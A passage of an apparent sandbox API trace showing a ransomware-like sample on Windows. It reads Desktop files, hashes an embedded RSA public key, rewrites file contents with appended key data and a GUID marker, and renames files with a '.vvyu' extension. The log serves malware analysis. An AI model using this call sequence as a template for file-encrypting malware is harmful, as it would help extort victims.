0x2c37840 [0184.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e888 [0184.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0184.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8a0 [0184.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e870 [0184.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e900 [0184.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0184.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8d0 [0184.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8b8 [0184.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e918 [0184.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8b8 | out: hHeap=0x6a0000) returned 1 [0184.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8b8 [0184.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8d0 | out: hHeap=0x6a0000) returned 1 [0184.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0184.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e888 | out: hHeap=0x6a0000) returned 1 [0184.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e888 [0184.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8e8 | out: hHeap=0x6a0000) returned 1 [0184.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e918 | out: hHeap=0x6a0000) returned 1 [0184.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0184.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0184.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e888 | out: hHeap=0x6a0000) returned 1 [0184.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0184.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0184.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0184.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8b8 | out: hHeap=0x6a0000) returned 1 [0184.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e900 | out: hHeap=0x6a0000) returned 1 [0184.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8a0 | out: hHeap=0x6a0000) returned 1 [0184.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e870 | out: hHeap=0x6a0000) returned 1 [0184.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e858 | out: hHeap=0x6a0000) returned 1 [0184.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d311c8 | out: hHeap=0x6a0000) returned 1 [0184.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0184.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.076] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0xe366, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0xe366, lpOverlapped=0x0) returned 1 [0184.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.077] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe36b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.078] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0184.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0184.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0184.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0184.079] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0184.079] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.079] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.079] CloseHandle (hObject=0x584) returned 1 [0184.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0184.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d41908 [0184.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0184.081] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\ScQyRdBL.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\scqyrdbl.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\ScQyRdBL.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\scqyrdbl.m4a.vvyu")) returned 1 [0184.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.083] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.087] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba819660, ftCreationTime.dwHighDateTime=0x1d89e40, ftLastAccessTime.dwLowDateTime=0xd2e8b550, ftLastAccessTime.dwHighDateTime=0x1d8a163, ftLastWriteTime.dwLowDateTime=0xd2e8b550, ftLastWriteTime.dwHighDateTime=0x1d8a163, nFileSizeHigh=0x0, nFileSizeLow=0x6d52, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vku7O.doc", cAlternateFileName="")) returned 1 [0184.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d311c8 [0184.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6ff30 [0184.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d311c8 | out: hHeap=0x6a0000) returned 1 [0184.087] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\vku7O.doc") returned=".doc" [0184.087] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\vku7O.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\vku7o.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.087] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=27986) returned 1 [0184.087] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.090] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x6d2c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.090] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.093] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.093] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x6d52, lpOverlapped=0x0) returned 1 [0184.093] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.094] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.094] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.094] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.095] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.095] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.095] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.095] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.095] GetLastError () returned 0x0 [0184.095] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.095] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.095] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.096] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.096] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6d50) returned 0x2d43778 [0184.096] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d311c8 [0184.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e858 [0184.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31210 [0184.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e870 [0184.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8a0 [0184.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e900 [0184.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8b8 [0184.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.097] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0184.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8a0 | out: hHeap=0x6a0000) returned 1 [0184.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8b8 | out: hHeap=0x6a0000) returned 1 [0184.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e900 | out: hHeap=0x6a0000) returned 1 [0184.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e900 [0184.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0184.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8b8 [0184.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e8a0 [0184.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0184.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0184.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0184.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8b8 | out: hHeap=0x6a0000) returned 1 [0184.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8a0 | out: hHeap=0x6a0000) returned 1 [0184.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e900 | out: hHeap=0x6a0000) returned 1 [0184.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.100] GetCurrentThreadId () returned 0x264 [0184.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0184.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d36718 [0184.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.101] GetCurrentThreadId () returned 0x264 [0184.101] RtlAllocateHeap (HeapHandle=0x6a0000, 